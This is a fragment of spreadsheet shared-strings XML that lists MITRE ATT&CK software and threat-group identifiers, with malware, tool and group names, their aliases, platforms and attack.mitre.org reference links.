  <si>
    <t>S0307</t>
  </si>
  <si>
    <t>S0306</t>
  </si>
  <si>
    <t>S0308</t>
  </si>
  <si>
    <t>S0094</t>
  </si>
  <si>
    <t>xFrost, Karagany</t>
  </si>
  <si>
    <t>S0001</t>
  </si>
  <si>
    <t>S0178</t>
  </si>
  <si>
    <t>Truvasys</t>
  </si>
  <si>
    <t>S0436</t>
  </si>
  <si>
    <t>TSCookie</t>
  </si>
  <si>
    <t>S0647</t>
  </si>
  <si>
    <t>Turian</t>
  </si>
  <si>
    <t>S0199</t>
  </si>
  <si>
    <t>TURNEDUP</t>
  </si>
  <si>
    <t>S0302</t>
  </si>
  <si>
    <t>Twitoor</t>
  </si>
  <si>
    <t>S0263</t>
  </si>
  <si>
    <t>TYPEFRAME</t>
  </si>
  <si>
    <t>S0116</t>
  </si>
  <si>
    <t>UACMe</t>
  </si>
  <si>
    <t>S0333</t>
  </si>
  <si>
    <t>UBoatRAT</t>
  </si>
  <si>
    <t>S0221</t>
  </si>
  <si>
    <t>Umbreon</t>
  </si>
  <si>
    <t>S0130</t>
  </si>
  <si>
    <t>S0275</t>
  </si>
  <si>
    <t>UPPERCUT</t>
  </si>
  <si>
    <t>ANEL</t>
  </si>
  <si>
    <t>S0022</t>
  </si>
  <si>
    <t>Uroburos</t>
  </si>
  <si>
    <t>S0386</t>
  </si>
  <si>
    <t>Ursnif</t>
  </si>
  <si>
    <t>Gozi-ISFB, PE_URSNIF, Dreambot</t>
  </si>
  <si>
    <t>S0452</t>
  </si>
  <si>
    <t>USBferry</t>
  </si>
  <si>
    <t>S0136</t>
  </si>
  <si>
    <t>USBStealer</t>
  </si>
  <si>
    <t>USB Stealer, Win32/USBStealer</t>
  </si>
  <si>
    <t>S0476</t>
  </si>
  <si>
    <t>Valak</t>
  </si>
  <si>
    <t>S0636</t>
  </si>
  <si>
    <t>VaporRage</t>
  </si>
  <si>
    <t>S0207</t>
  </si>
  <si>
    <t>Vasport</t>
  </si>
  <si>
    <t>S0442</t>
  </si>
  <si>
    <t>VBShower</t>
  </si>
  <si>
    <t>S0257</t>
  </si>
  <si>
    <t>S0418</t>
  </si>
  <si>
    <t>ViceLeaker</t>
  </si>
  <si>
    <t>Triout</t>
  </si>
  <si>
    <t>S0506</t>
  </si>
  <si>
    <t>ViperRAT</t>
  </si>
  <si>
    <t>S0180</t>
  </si>
  <si>
    <t>Volgmer</t>
  </si>
  <si>
    <t>S0366</t>
  </si>
  <si>
    <t>WannaCry</t>
  </si>
  <si>
    <t>WanaCry, WanaCrypt, WanaCrypt0r, WCry</t>
  </si>
  <si>
    <t>S0612</t>
  </si>
  <si>
    <t>WastedLocker</t>
  </si>
  <si>
    <t>S0579</t>
  </si>
  <si>
    <t>Waterbear</t>
  </si>
  <si>
    <t>S0109</t>
  </si>
  <si>
    <t>WEBC2</t>
  </si>
  <si>
    <t>S0515</t>
  </si>
  <si>
    <t>WellMail</t>
  </si>
  <si>
    <t>S0514</t>
  </si>
  <si>
    <t>WellMess</t>
  </si>
  <si>
    <t>S0645</t>
  </si>
  <si>
    <t>Wevtutil</t>
  </si>
  <si>
    <t>S0206</t>
  </si>
  <si>
    <t>Wiarp</t>
  </si>
  <si>
    <t>S0005</t>
  </si>
  <si>
    <t>Windows Credential Editor</t>
  </si>
  <si>
    <t>WCE</t>
  </si>
  <si>
    <t>S0155</t>
  </si>
  <si>
    <t>S0466</t>
  </si>
  <si>
    <t>WindTail</t>
  </si>
  <si>
    <t>S0219</t>
  </si>
  <si>
    <t>WINERACK</t>
  </si>
  <si>
    <t>S0191</t>
  </si>
  <si>
    <t>Winexe</t>
  </si>
  <si>
    <t>S0176</t>
  </si>
  <si>
    <t>Wingbird</t>
  </si>
  <si>
    <t>S0059</t>
  </si>
  <si>
    <t>WinMM</t>
  </si>
  <si>
    <t>S0430</t>
  </si>
  <si>
    <t>Winnti for Linux</t>
  </si>
  <si>
    <t>S0141</t>
  </si>
  <si>
    <t>Winnti for Windows</t>
  </si>
  <si>
    <t>S0041</t>
  </si>
  <si>
    <t>S0312</t>
  </si>
  <si>
    <t>WireLurker</t>
  </si>
  <si>
    <t>S0489</t>
  </si>
  <si>
    <t>WolfRAT</t>
  </si>
  <si>
    <t>S0314</t>
  </si>
  <si>
    <t>S0161</t>
  </si>
  <si>
    <t>XAgentOSX</t>
  </si>
  <si>
    <t>OSX.Sofacy</t>
  </si>
  <si>
    <t>S0341</t>
  </si>
  <si>
    <t>Xbash</t>
  </si>
  <si>
    <t>S0298</t>
  </si>
  <si>
    <t>Xbot</t>
  </si>
  <si>
    <t>S0653</t>
  </si>
  <si>
    <t>xCaon</t>
  </si>
  <si>
    <t>S0123</t>
  </si>
  <si>
    <t>xCmd</t>
  </si>
  <si>
    <t>S0297</t>
  </si>
  <si>
    <t>XcodeGhost</t>
  </si>
  <si>
    <t>S0658</t>
  </si>
  <si>
    <t>XCSSET</t>
  </si>
  <si>
    <t>OSX.DubRobber</t>
  </si>
  <si>
    <t>S0318</t>
  </si>
  <si>
    <t>XLoader for Android</t>
  </si>
  <si>
    <t>S0490</t>
  </si>
  <si>
    <t>XLoader for iOS</t>
  </si>
  <si>
    <t>S0117</t>
  </si>
  <si>
    <t>XTunnel</t>
  </si>
  <si>
    <t>Trojan.Shunnael, X-Tunnel, XAPS</t>
  </si>
  <si>
    <t>S0388</t>
  </si>
  <si>
    <t>YAHOYAH</t>
  </si>
  <si>
    <t>S0311</t>
  </si>
  <si>
    <t>S0248</t>
  </si>
  <si>
    <t>yty</t>
  </si>
  <si>
    <t>S0251</t>
  </si>
  <si>
    <t>Zebrocy</t>
  </si>
  <si>
    <t>Zekapab</t>
  </si>
  <si>
    <t>S0494</t>
  </si>
  <si>
    <t>Zen</t>
  </si>
  <si>
    <t>S0287</t>
  </si>
  <si>
    <t>ZergHelper</t>
  </si>
  <si>
    <t>S0027</t>
  </si>
  <si>
    <t>Zeroaccess</t>
  </si>
  <si>
    <t>Trojan.Zeroaccess</t>
  </si>
  <si>
    <t>S0230</t>
  </si>
  <si>
    <t>ZeroT</t>
  </si>
  <si>
    <t>S0330</t>
  </si>
  <si>
    <t>Zeus Panda</t>
  </si>
  <si>
    <t>S0086</t>
  </si>
  <si>
    <t>ZLib</t>
  </si>
  <si>
    <t>S0350</t>
  </si>
  <si>
    <t>zwShell</t>
  </si>
  <si>
    <t>S0412</t>
  </si>
  <si>
    <t>ZxShell</t>
  </si>
  <si>
    <t>Sensocode</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0066/</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0065</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0469</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0202</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0552</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0309</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0045</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0440</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0331</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0092</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0319</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0504</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0525</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0304</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0524</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0310</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0292</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0422</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0584</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0622</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0456</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0099</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0540</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0073</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0373</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0110</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0438</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0347</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0129</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0640</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0473</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MALWARE</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>Windows</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TOOL</t>
  </si>
  <si>
    <t>Android</t>
  </si>
  <si>
    <t>Windows, macOS</t>
  </si>
  <si>
    <t>Windows, Android</t>
  </si>
  <si>
    <t>Linux, Windows, macOS</t>
  </si>
  <si>
    <t>G0018</t>
  </si>
  <si>
    <t>admin@338</t>
  </si>
  <si>
    <t>G0130</t>
  </si>
  <si>
    <t>Ajax Security Team</t>
  </si>
  <si>
    <t>Operation Woolen-Goldfish, AjaxTM, Rocket Kitten, Flying Kitten, Operation Saffron Rose</t>
  </si>
  <si>
    <t>G0138</t>
  </si>
  <si>
    <t>Andariel</t>
  </si>
  <si>
    <t>Silent Chollima</t>
  </si>
  <si>
    <t>G0099</t>
  </si>
  <si>
    <t>APT-C-36</t>
  </si>
  <si>
    <t>Blind Eagle</t>
  </si>
  <si>
    <t>G0006</t>
  </si>
  <si>
    <t>APT1</t>
  </si>
  <si>
    <t>Comment Crew, Comment Group, Comment Panda</t>
  </si>
  <si>
    <t>G0005</t>
  </si>
  <si>
    <t>APT12</t>
  </si>
  <si>
    <t>IXESHE, DynCalc, Numbered Panda, DNSCALC</t>
  </si>
  <si>
    <t>G0023</t>
  </si>
  <si>
    <t>APT16</t>
  </si>
  <si>
    <t>G0025</t>
  </si>
  <si>
    <t>APT17</t>
  </si>
  <si>
    <t>Deputy Dog</t>
  </si>
  <si>
    <t>G0026</t>
  </si>
  <si>
    <t>APT18</t>
  </si>
  <si>
    <t>TG-0416, Dynamite Panda, Threat Group-0416</t>
  </si>
  <si>
    <t>G0073</t>
  </si>
  <si>
    <t>APT19</t>
  </si>
  <si>
    <t>Codoso, C0d0so0, Codoso Team, Sunshop Group</t>
  </si>
  <si>
    <t>G0007</t>
  </si>
  <si>
    <t>APT28</t>
  </si>
  <si>
    <t>SNAKEMACKEREL, Swallowtail, Group 74, Sednit, Sofacy, Pawn Storm, Fancy Bear, STRONTIUM, Tsar Team, Threat Group-4127, TG-4127</t>
  </si>
  <si>
    <t>G0016</t>
  </si>
  <si>
    <t>APT29</t>
  </si>
  <si>
    <t>NobleBaron, Dark Halo, StellarParticle, NOBELIUM, UNC2452, YTTRIUM, The Dukes, Cozy Bear, CozyDuke</t>
  </si>
  <si>
    <t>G0022</t>
  </si>
  <si>
    <t>APT3</t>
  </si>
  <si>
    <t>Gothic Panda, Pirpi, UPS Team, Buckeye, Threat Group-0110, TG-0110</t>
  </si>
  <si>
    <t>G0013</t>
  </si>
  <si>
    <t>APT30</t>
  </si>
  <si>
    <t>G0050</t>
  </si>
  <si>
    <t>APT32</t>
  </si>
  <si>
    <t>SeaLotus, OceanLotus, APT-C-00</t>
  </si>
  <si>
    <t>G0064</t>
  </si>
  <si>
    <t>APT33</t>
  </si>
  <si>
    <t>HOLMIUM, Elfin</t>
  </si>
  <si>
    <t>G0067</t>
  </si>
  <si>
    <t>APT37</t>
  </si>
  <si>
    <t>Richochet Chollima, InkySquid, ScarCruft, Reaper, Group123, TEMP.Reaper</t>
  </si>
  <si>
    <t>G0082</t>
  </si>
  <si>
    <t>APT38</t>
  </si>
  <si>
    <t>NICKEL GLADSTONE, BeagleBoyz, Bluenoroff, Stardust Chollima</t>
  </si>
  <si>
    <t>G0087</t>
  </si>
  <si>
    <t>APT39</t>
  </si>
  <si>
    <t>REMIX KITTEN, ITG07, Chafer</t>
  </si>
  <si>
    <t>G0096</t>
  </si>
  <si>
    <t>APT41</t>
  </si>
  <si>
    <t>WICKED PANDA</t>
  </si>
  <si>
    <t>G0001</t>
  </si>
  <si>
    <t>Axiom</t>
  </si>
  <si>
    <t>Group 72</t>
  </si>
  <si>
    <t>G0135</t>
  </si>
  <si>
    <t>BackdoorDiplomacy</t>
  </si>
  <si>
    <t>G0063</t>
  </si>
  <si>
    <t>BlackOasis</t>
  </si>
  <si>
    <t>G0098</t>
  </si>
  <si>
    <t>BlackTech</t>
  </si>
  <si>
    <t>G0108</t>
  </si>
  <si>
    <t>G0097</t>
  </si>
  <si>
    <t>G0060</t>
  </si>
  <si>
    <t>BRONZE BUTLER</t>
  </si>
  <si>
    <t>REDBALDKNIGHT, Tick</t>
  </si>
  <si>
    <t>G0008</t>
  </si>
  <si>
    <t>G0114</t>
  </si>
  <si>
    <t>Chimera</t>
  </si>
  <si>
    <t>G0003</t>
  </si>
  <si>
    <t>Cleaver</t>
  </si>
  <si>
    <t>Threat Group 2889, TG-2889</t>
  </si>
  <si>
    <t>G0080</t>
  </si>
  <si>
    <t>GOLD KINGSWOOD, Cobalt Gang, Cobalt Spider</t>
  </si>
  <si>
    <t>G0052</t>
  </si>
  <si>
    <t>CopyKittens</t>
  </si>
  <si>
    <t>G0132</t>
  </si>
  <si>
    <t>CostaRicto</t>
  </si>
  <si>
    <t>G0070</t>
  </si>
  <si>
    <t>Dark Caracal</t>
  </si>
  <si>
    <t>G0012</t>
  </si>
  <si>
    <t>Darkhotel</t>
  </si>
  <si>
    <t>DUBNIUM</t>
  </si>
  <si>
    <t>G0079</t>
  </si>
  <si>
    <t>DarkHydrus</t>
  </si>
  <si>
    <t>G0105</t>
  </si>
  <si>
    <t>DarkVishnya</t>
  </si>
  <si>
    <t>G0009</t>
  </si>
  <si>
    <t>Deep Panda</t>
  </si>
  <si>
    <t>Shell Crew, WebMasters, KungFu Kittens, PinkPanther, Black Vine</t>
  </si>
  <si>
    <t>G0035</t>
  </si>
  <si>
    <t>TG-4192, Crouching Yeti, IRON LIBERTY, Energetic Bear</t>
  </si>
  <si>
    <t>G0074</t>
  </si>
  <si>
    <t>Dragonfly 2.0</t>
  </si>
  <si>
    <t>IRON LIBERTY, DYMALLOY, Berserk Bear</t>
  </si>
  <si>
    <t>G0017</t>
  </si>
  <si>
    <t>DragonOK</t>
  </si>
  <si>
    <t>G0031</t>
  </si>
  <si>
    <t>Dust Storm</t>
  </si>
  <si>
    <t>G0066</t>
  </si>
  <si>
    <t>Elderwood</t>
  </si>
  <si>
    <t>Elderwood Gang, Beijing Group, Sneaky Panda</t>
  </si>
  <si>
    <t>G0020</t>
  </si>
  <si>
    <t>Equation</t>
  </si>
  <si>
    <t>G0120</t>
  </si>
  <si>
    <t>Evilnum</t>
  </si>
  <si>
    <t>G0137</t>
  </si>
  <si>
    <t>Ferocious Kitten</t>
  </si>
  <si>
    <t>G0051</t>
  </si>
  <si>
    <t>FIN10</t>
  </si>
  <si>
    <t>G0085</t>
  </si>
  <si>
    <t>FIN4</t>
  </si>
  <si>
    <t>G0053</t>
  </si>
  <si>
    <t>FIN5</t>
  </si>
  <si>
    <t>G0037</t>
  </si>
  <si>
    <t>FIN6</t>
  </si>
  <si>
    <t>Magecart Group 6, SKELETON SPIDER, ITG08</t>
  </si>
  <si>
    <t>G0046</t>
  </si>
  <si>
    <t>FIN7</t>
  </si>
  <si>
    <t>GOLD NIAGARA, ITG14, Carbon Spider</t>
  </si>
  <si>
    <t>G0061</t>
  </si>
  <si>
    <t>FIN8</t>
  </si>
  <si>
    <t>G0117</t>
  </si>
  <si>
    <t>Fox Kitten</t>
  </si>
  <si>
    <t>UNC757, PIONEER KITTEN, Parisite</t>
  </si>
  <si>
    <t>G0101</t>
  </si>
  <si>
    <t>Frankenstein</t>
  </si>
  <si>
    <t>G0093</t>
  </si>
  <si>
    <t>GALLIUM</t>
  </si>
  <si>
    <t>Operation Soft Cell</t>
  </si>
  <si>
    <t>G0084</t>
  </si>
  <si>
    <t>Gallmaker</t>
  </si>
  <si>
    <t>G0047</t>
  </si>
  <si>
    <t>Gamaredon Group</t>
  </si>
  <si>
    <t>G0036</t>
  </si>
  <si>
    <t>GCMAN</t>
  </si>
  <si>
    <t>G0115</t>
  </si>
  <si>
    <t>GOLD SOUTHFIELD</t>
  </si>
  <si>
    <t>G0078</t>
  </si>
  <si>
    <t>Gorgon Group</t>
  </si>
  <si>
    <t>G0043</t>
  </si>
  <si>
    <t>Group5</t>
  </si>
  <si>
    <t>G0125</t>
  </si>
  <si>
    <t>HAFNIUM</t>
  </si>
  <si>
    <t>Operation Exchange Marauder</t>
  </si>
  <si>
    <t>G0126</t>
  </si>
  <si>
    <t>Higaisa</t>
  </si>
  <si>
    <t>G0072</t>
  </si>
  <si>
    <t>Honeybee</t>
  </si>
  <si>
    <t>G0100</t>
  </si>
  <si>
    <t>Inception</t>
  </si>
  <si>
    <t>Inception Framework, Cloud Atlas</t>
  </si>
  <si>
    <t>G0136</t>
  </si>
  <si>
    <t>IndigoZebra</t>
  </si>
  <si>
    <t>G0119</t>
  </si>
  <si>
    <t>Indrik Spider</t>
  </si>
  <si>
    <t>Evil Corp</t>
  </si>
  <si>
    <t>G0004</t>
  </si>
  <si>
    <t>Ke3chang</t>
  </si>
  <si>
    <t>APT15, Mirage, Vixen Panda, GREF, Playful Dragon, RoyalAPT</t>
  </si>
  <si>
    <t>G0094</t>
  </si>
  <si>
    <t>Kimsuky</t>
  </si>
  <si>
    <t>STOLEN PENCIL, Thallium, Black Banshee, Velvet Chollima</t>
  </si>
  <si>
    <t>G0032</t>
  </si>
  <si>
    <t>Lazarus Group</t>
  </si>
  <si>
    <t>HIDDEN COBRA, Guardians of Peace, ZINC, NICKEL ACADEMY</t>
  </si>
  <si>
    <t>G0077</t>
  </si>
  <si>
    <t>Leafminer</t>
  </si>
  <si>
    <t>Raspite</t>
  </si>
  <si>
    <t>G0065</t>
  </si>
  <si>
    <t>Leviathan</t>
  </si>
  <si>
    <t>MUDCARP, Kryptonite Panda, Gadolinium, BRONZE MOHAWK, TEMP.Jumper, APT40, TEMP.Periscope</t>
  </si>
  <si>
    <t>G0030</t>
  </si>
  <si>
    <t>Lotus Blossom</t>
  </si>
  <si>
    <t>DRAGONFISH, Spring Dragon</t>
  </si>
  <si>
    <t>G0095</t>
  </si>
  <si>
    <t>APT-C-43, El Machete</t>
  </si>
  <si>
    <t>G0059</t>
  </si>
  <si>
    <t>Magic Hound</t>
  </si>
  <si>
    <t>TA453, COBALT ILLUSION, Charming Kitten, ITG18, Phosphorus, Newscaster, APT35</t>
  </si>
  <si>
    <t>G0045</t>
  </si>
  <si>
    <t>menuPass</t>
  </si>
  <si>
    <t>Cicada, POTASSIUM, Stone Panda, APT10, Red Apollo, CVNX, HOGFISH</t>
  </si>
  <si>
    <t>G0002</t>
  </si>
  <si>
    <t>Moafee</t>
  </si>
  <si>
    <t>G0103</t>
  </si>
  <si>
    <t>Mofang</t>
  </si>
  <si>
    <t>G0021</t>
  </si>
  <si>
    <t>Molerats</t>
  </si>
  <si>
    <t>Operation Molerats, Gaza Cybergang</t>
  </si>
  <si>
    <t>G0069</t>
  </si>
  <si>
    <t>MuddyWater</t>
  </si>
  <si>
    <t>Earth Vetala , MERCURY, Static Kitten, Seedworm, TEMP.Zagros</t>
  </si>
  <si>
    <t>G0129</t>
  </si>
  <si>
    <t>Mustang Panda</t>
  </si>
  <si>
    <t>TA416, RedDelta, BRONZE PRESIDENT</t>
  </si>
  <si>
    <t>G0019</t>
  </si>
  <si>
    <t>Naikon</t>
  </si>
  <si>
    <t>G0055</t>
  </si>
  <si>
    <t>NEODYMIUM</t>
  </si>
  <si>
    <t>G0014</t>
  </si>
  <si>
    <t>Night Dragon</t>
  </si>
  <si>
    <t>G0133</t>
  </si>
  <si>
    <t>Nomadic Octopus</t>
  </si>
  <si>
    <t>DustSquad</t>
  </si>
  <si>
    <t>G0049</t>
  </si>
  <si>
    <t>OilRig</t>
  </si>
  <si>
    <t>COBALT GYPSY, IRN2, HELIX KITTEN, APT34</t>
  </si>
  <si>
    <t>G0116</t>
  </si>
  <si>
    <t>Operation Wocao</t>
  </si>
  <si>
    <t>G0071</t>
  </si>
  <si>
    <t>Orangeworm</t>
  </si>
  <si>
    <t>G0040</t>
  </si>
  <si>
    <t>Patchwork</t>
  </si>
  <si>
    <t>Hangover Group, Dropping Elephant, Chinastrats, MONSOON, Operation Hangover</t>
  </si>
  <si>
    <t>G0011</t>
  </si>
  <si>
    <t>PittyTiger</t>
  </si>
  <si>
    <t>G0068</t>
  </si>
  <si>
    <t>PLATINUM</t>
  </si>
  <si>
    <t>G0033</t>
  </si>
  <si>
    <t>Poseidon Group</t>
  </si>
  <si>
    <t>G0056</t>
  </si>
  <si>
    <t>PROMETHIUM</t>
  </si>
  <si>
    <t>G0024</t>
  </si>
  <si>
    <t>Putter Panda</t>
  </si>
  <si>
    <t>APT2, MSUpdater</t>
  </si>
  <si>
    <t>G0075</t>
  </si>
  <si>
    <t>Rancor</t>
  </si>
  <si>
    <t>G0106</t>
  </si>
  <si>
    <t>Rocke</t>
  </si>
  <si>
    <t>G0048</t>
  </si>
  <si>
    <t>G0034</t>
  </si>
  <si>
    <t>Sandworm Team</t>
  </si>
  <si>
    <t>ELECTRUM, Telebots, IRON VIKING, BlackEnergy (Group), Quedagh, VOODOO BEAR</t>
  </si>
  <si>
    <t>G0029</t>
  </si>
  <si>
    <t>Scarlet Mimic</t>
  </si>
  <si>
    <t>G0104</t>
  </si>
  <si>
    <t>Sharpshooter</t>
  </si>
  <si>
    <t>G0121</t>
  </si>
  <si>
    <t>Sidewinder</t>
  </si>
  <si>
    <t>T-APT-04, Rattlesnake</t>
  </si>
  <si>
    <t>G0091</t>
  </si>
  <si>
    <t>Silence</t>
  </si>
  <si>
    <t>WHISPER SPIDER</t>
  </si>
  <si>
    <t>G0122</t>
  </si>
  <si>
    <t>Silent Librarian</t>
  </si>
  <si>
    <t>TA407, COBALT DICKENS</t>
  </si>
  <si>
    <t>G0083</t>
  </si>
  <si>
    <t>SilverTerrier</t>
  </si>
  <si>
    <t>G0054</t>
  </si>
  <si>
    <t>Sowbug</t>
  </si>
  <si>
    <t>G0038</t>
  </si>
  <si>
    <t>Stealth Falcon</t>
  </si>
  <si>
    <t>G0041</t>
  </si>
  <si>
    <t>Strider</t>
  </si>
  <si>
    <t>ProjectSauron</t>
  </si>
  <si>
    <t>G0039</t>
  </si>
  <si>
    <t>Suckfly</t>
  </si>
  <si>
    <t>G0062</t>
  </si>
  <si>
    <t>TA459</t>
  </si>
  <si>
    <t>G0092</t>
  </si>
  <si>
    <t>TA505</t>
  </si>
  <si>
    <t>Hive0065</t>
  </si>
  <si>
    <t>G0127</t>
  </si>
  <si>
    <t>TA551</t>
  </si>
  <si>
    <t>GOLD CABIN, Shathak</t>
  </si>
  <si>
    <t>G0139</t>
  </si>
  <si>
    <t>TeamTNT</t>
  </si>
  <si>
    <t>G0088</t>
  </si>
  <si>
    <t>TEMP.Veles</t>
  </si>
  <si>
    <t>XENOTIME</t>
  </si>
  <si>
    <t>G0089</t>
  </si>
  <si>
    <t>G0028</t>
  </si>
  <si>
    <t>Threat Group-1314</t>
  </si>
  <si>
    <t>TG-1314</t>
  </si>
  <si>
    <t>G0027</t>
  </si>
  <si>
    <t>Threat Group-3390</t>
  </si>
  <si>
    <t>TG-3390, Emissary Panda, BRONZE UNION, APT27, Iron Tiger, LuckyMouse</t>
  </si>
  <si>
    <t>G0076</t>
  </si>
  <si>
    <t>Thrip</t>
  </si>
  <si>
    <t>G0131</t>
  </si>
  <si>
    <t>Tonto Team</t>
  </si>
  <si>
    <t>Earth Akhlut, BRONZE HUNTLEY, CactusPete, Karma Panda</t>
  </si>
  <si>
    <t>G0134</t>
  </si>
  <si>
    <t>Transparent Tribe</t>
  </si>
  <si>
    <t>COPPER FIELDSTONE, APT36, Mythic Leopard, ProjectM</t>
  </si>
  <si>
    <t>G0081</t>
  </si>
  <si>
    <t>Tropic Trooper</t>
  </si>
  <si>
    <t>Pirate Panda, KeyBoy</t>
  </si>
  <si>
    <t>G0010</t>
  </si>
  <si>
    <t>Turla</t>
  </si>
  <si>
    <t>Group 88, Belugasturgeon, Waterbug, WhiteBear, VENOMOUS BEAR, Snake, Krypton</t>
  </si>
  <si>
    <t>G0123</t>
  </si>
  <si>
    <t>Volatile Cedar</t>
  </si>
  <si>
    <t>Lebanese Cedar</t>
  </si>
  <si>
    <t>G0107</t>
  </si>
  <si>
    <t>Whitefly</t>
  </si>
  <si>
    <t>G0124</t>
  </si>
  <si>
    <t>Windigo</t>
  </si>
  <si>
    <t>G0112</t>
  </si>
  <si>
    <t>Windshift</t>
  </si>
  <si>
    <t>Bahamut</t>
  </si>
  <si>
    <t>G0044</t>
  </si>
  <si>
    <t>Winnti Group</t>
  </si>
  <si>
    <t>Blackfly</t>
  </si>
  <si>
    <t>G0090</t>
  </si>
  <si>
    <t>WIRTE</t>
  </si>
  <si>
    <t>G0102</t>
  </si>
  <si>
    <t>Wizard Spider</t>
  </si>
  <si>
    <t>UNC1878, TEMP.MixMaster, Grim Spider</t>
  </si>
  <si>
    <t>G0128</t>
  </si>
  <si>
    <t>ZIRCONIUM</t>
  </si>
  <si>
    <t>APT31</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0018/</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0130</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0138</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0099</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0023</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0025</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0026</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0016</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0022</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0073</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0050</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0067</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0064</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0082</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0087</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0096</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0135</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0063</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0098</t>
